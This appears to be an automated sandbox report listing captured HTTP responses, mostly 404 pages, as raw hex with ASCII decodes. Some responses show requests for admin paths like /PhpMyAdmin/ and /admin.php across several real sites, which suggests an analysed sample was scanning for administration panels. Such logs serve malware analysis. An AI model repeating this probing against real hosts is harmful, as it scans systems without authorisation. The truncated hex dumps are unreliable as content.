20 46 6f 75 6e 64 20 7c 20 47 52 47 31 37 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 6c 65 74 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 5d 2c 6a 51 75 65 72 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 6a 51 75 65 72 79 7d 2c 24 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 24 7d 3b 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 3d 6a 51 75 65 72 79 2c 77 69 6e 64 6f 77 2e 24 3d 6a 51 75 65 72 79 3b 6c 65 74 20 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 31 3b 6a 51 75 65 72 79 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 24 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 66 28 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 29 72 65 74 75 72 6e 20 6a 51 75 65 72 79 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 24 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 7d 2c 24 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:35 GMTServer: ApacheX-Powered-By: PHP/8.0.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://gccb.co.in/wp-json/>; rel="https://api.w.org/"Vary: User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 64 38 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 54 68 65 20 47 6f 64 68 72 61 20 43 69 74 79 20 43 6f 2d 6f 70 20 42 61 6e 6b 20 4c 74 64 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 2f 2f 73 2e 77 2e 6f 72 67 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 54 68 65 20 47 6f 64 68 72 61 20 43 69 74 79 20 43 6f 2d 6f 70 20 42 61 6e 6b 20 4c 74 64 2e 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 63 63 62 2e 63 6f 2e 69 6e 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 54 68 65 20 47 6f 64 68 72 61 20 43 69 74 79 20 43 6f 2d 6f 70 20 42 61 6e 6b 20 4c 74 64 2e 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 63 63 62 2e 63 6f 2e 69 6e 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:37 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:37 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-242.ec2.internalX-Request-Id: efc0c331-db35-4906-89b3-c759afc17f2cData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 12 Sep 2019 15:06:38 GMTETag: W/"3fe-5925c7bf8c9e3"Content-Encoding: gzipData Raw: 32 35 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 53 dd 6b db 30 10 7f f7 5f 71 f3 4b 5f f2 b1 8e 6e 0f c3 0b a4 24 a3 81 76 1d 4d c6 28 a5 0c c5 3a c5 a2 b2 e4 49 a7 ba fe ef 7b b2 92 32 ba 17 1b db fa 7d de b9 ba da dd 5c 2f 8a ea 6a bd 5c f1 6d b7 d9 5d af 17 17 1f 2f e0 87 23 f8 ee a2 95 d5 3c bf 2c aa cb e5 76 0d 8d 47 f5 ad 9c a3 f7 ce ff 91 ae 0e f3 72 51 7d 98 4e 1f b4 02 43 08 9b 35 7c 79 5c 54 f3 74 98 3f 3c a0 95 5a 3d 4e a7 4c 3e 3f 8a 5c de ae ee 93 e4 f9 e2 1f 11 7e 2a 76 0d 82 c7 bf 11 03 a1 04 26 8f 2d 5a 82 5e 04 b0 6c 47 25 3b e0 2c 50 a3 03 04 f4 cf e8 67 45 f5 33 71 dd f1 65 b9 5a dd ad b7 db 45 f1 1b f7 b0 1d 3f 83 60 18 4a f4 bd 36 72 26 88 4d bc 9d 62 8f d9 c8 3c 77 50 a4 18 05 00 4c e1 97 55 ce 53 b4 82 d0 0c 13 b8 d1 b5 77 c1 29 82 86 ad 08 29 d9 9d 80 da 20 1b 00 8b 7d 06 95 0a 05 45 8f 25 90 83 8d 25 f4 16 09 d6 2f 9d 71 9e 8d c2 46 b1 71 04 c2 17 02 a7 32 46 58 18 9b 3c 0b d0 62 08 e2 80 c0 d1 4a 72 0e 42 2b 8c 29 27 10 3a ac b5 d2 35 3f 0d 19 64 f8 24 53 31 f6 f3 f9 27 d8 0f 84 61 f2 bf 20 37 c9 6e 6c c8 18 4d 01 5c 7f 54 3b 69 cd e0 de 45 a8 99 28 9d 4c 94 c9 99 9a 64 c8 3e 12 68 62 67 1d 33 d1 00 e4 75 fd c4 37 07 4a f3 1c 42 af a9 6e 18 6d 0c ca 8c 28 d9 b3 a7 9c e8 a4 11 ca 19 ec 12 71 8b c2 b2 4f a7 a0 76 d1 07 3c aa 8c a2 a1 e1 ba df e1 40 78 84 1a 6d e0 f6 24 a7 04 89 4a 44 43 b3 ac b5 d9 6c 41 98 5e 0c e1 14 f4 3d 7e 64 4e 24 c6 d9 43 06 a1 75 f1 d0 a4 08 ad 78 e2 5d 7d 3f 24 9e 6f d7 0d c9 30 66 40 ef fc 93 f0 e3 de f1 5c 8e 45 04 dd 76 06 bf 42 27 e4 38 d1 71 82 f9 fc 69 88 dc 4d c3 2b b2 d7 07 4e db 8e 5b 6c 34 2b 8e 9b cb f2 5d 0c 0d 97 9b 41 2e ad 51 5a 0d a5 9f 11 1a 5e f2 94 58 70 c7 d4 a3 e1 57 e3 88 a1 d5 56 b7 b1 3d e6 bf 7d eb 71 9c 1b 8f 09 5f 44 4d 66 80 3e b5 3d b8 78 c6 d1 3d 0a a9 4f e9 bd 3e 34 c4 7f 52 9f 29 f8 97 7c 05 7e a9 4a 3b fe 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 25ceSk0_qK_n$vM(:I{2}\/j\m]/#<,vGrQ}NC5|y\Tt?<Z=NL>?\~*v&-Z^lG%;,PgE3qeZE?`J6r&Mb<wPLUSw)) }E%%/qFq2FX<bJrB+)':5?d$S1'a 7nlM\T;iE(Ld>hbg3u7JBnm(qOv<@xm$JDClA^=~dN$Cux]}?$o0f@\EvB'8qiM+N[l4+]A.QZ^XpWV=}q_DMf>=x=O>4R)|~J;0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 12 Sep 2019 15:06:38 GMTETag: W/"3fe-5925c7bf8c9e3"Content-Encoding: gzipData Raw: 32 35 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 53 dd 6b db 30 10 7f f7 5f 71 f3 4b 5f f2 b1 8e 6e 0f c3 0b a4 24 a3 81 76 1d 4d c6 28 a5 0c c5 3a c5 a2 b2 e4 49 a7 ba fe ef 7b b2 92 32 ba 17 1b db fa 7d de b9 ba da dd 5c 2f 8a ea 6a bd 5c f1 6d b7 d9 5d af 17 17 1f 2f e0 87 23 f8 ee a2 95 d5 3c bf 2c aa cb e5 76 0d 8d 47 f5 ad 9c a3 f7 ce ff 91 ae 0e f3 72 51 7d 98 4e 1f b4 02 43 08 9b 35 7c 79 5c 54 f3 74 98 3f 3c a0 95 5a 3d 4e a7 4c 3e 3f 8a 5c de ae ee 93 e4 f9 e2 1f 11 7e 2a 76 0d 82 c7 bf 11 03 a1 04 26 8f 2d 5a 82 5e 04 b0 6c 47 25 3b e0 2c 50 a3 03 04 f4 cf e8 67 45 f5 33 71 dd f1 65 b9 5a dd ad b7 db 45 f1 1b f7 b0 1d 3f 83 60 18 4a f4 bd 36 72 26 88 4d bc 9d 62 8f d9 c8 3c 77 50 a4 18 05 00 4c e1 97 55 ce 53 b4 82 d0 0c 13 b8 d1 b5 77 c1 29 82 86 ad 08 29 d9 9d 80 da 20 1b 00 8b 7d 06 95 0a 05 45 8f 25 90 83 8d 25 f4 16 09 d6 2f 9d 71 9e 8d c2 46 b1 71 04 c2 17 02 a7 32 46 58 18 9b 3c 0b d0 62 08 e2 80 c0 d1 4a 72 0e 42 2b 8c 29 27 10 3a ac b5 d2 35 3f 0d 19 64 f8 24 53 31 f6 f3 f9 27 d8 0f 84 61 f2 bf 20 37 c9 6e 6c c8 18 4d 01 5c 7f 54 3b 69 cd e0 de 45 a8 99 28 9d 4c 94 c9 99 9a 64 c8 3e 12 68 62 67 1d 33 d1 00 e4 75 fd c4 37 07 4a f3 1c 42 af a9 6e 18 6d 0c ca 8c 28 d9 b3 a7 9c e8 a4 11 ca 19 ec 12 71 8b c2 b2 4f a7 a0 76 d1 07 3c aa 8c a2 a1 e1 ba df e1 40 78 84 1a 6d e0 f6 24 a7 04 89 4a 44 43 b3 ac b5 d9 6c 41 98 5e 0c e1 14 f4 3d 7e 64 4e 24 c6 d9 43 06 a1 75 f1 d0 a4 08 ad 78 e2 5d 7d 3f 24 9e 6f d7 0d c9 30 66 40 ef fc 93 f0 e3 de f1 5c 8e 45 04 dd 76 06 bf 42 27 e4 38 d1 71 82 f9 fc 69 88 dc 4d c3 2b b2 d7 07 4e db 8e 5b 6c 34 2b 8e 9b cb f2 5d 0c 0d 97 9b 41 2e ad 51 5a 0d a5 9f 11 1a 5e f2 94 58 70 c7 d4 a3 e1 57 e3 88 a1 d5 56 b7 b1 3d e6 bf 7d eb 71 9c 1b 8f 09 5f 44 4d 66 80 3e b5 3d b8 78 c6 d1 3d 0a a9 4f e9 bd 3e 34 c4 7f 52 9f 29 f8 97 7c 05 7e a9 4a 3b fe 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 25ceSk0_qK_n$vM(:I{2}\/j\m]/#<,vGrQ}NC5|y\Tt?<Z=NL>?\~*v&-Z^lG%;,PgE3qeZE?`J6r&Mb<wPLUSw)) }E%%/qFq2FX<bJrB+)':5?d$S1'a 7nlM\T;iE(Ld>hbg3u7JBnm(qOv<@xm$JDClA^=~dN$Cux]}?$o0f@\EvB'8qiM+N[l4+]A.QZ^XpWV=}q_DMf>=x=O>4R)|~J;0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:37 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:37 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:37 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-88.ec2.internalX-Request-Id: 44a54137-f06a-49d5-b31c-8e0c6d123a10Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:37 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16Content-Length: 209Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /PhpMyAdmin/ was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:37 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16Content-Length: 207Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /admin.php was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:37 GMTServer: ApacheVary: accept-language,accept-charset,User-AgentAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 33 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 62 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 3e 77 65 62 6
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Sun, 26 Nov 2023 05:59:37 GMTContent-Type: text/htmlContent-Length: 118Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
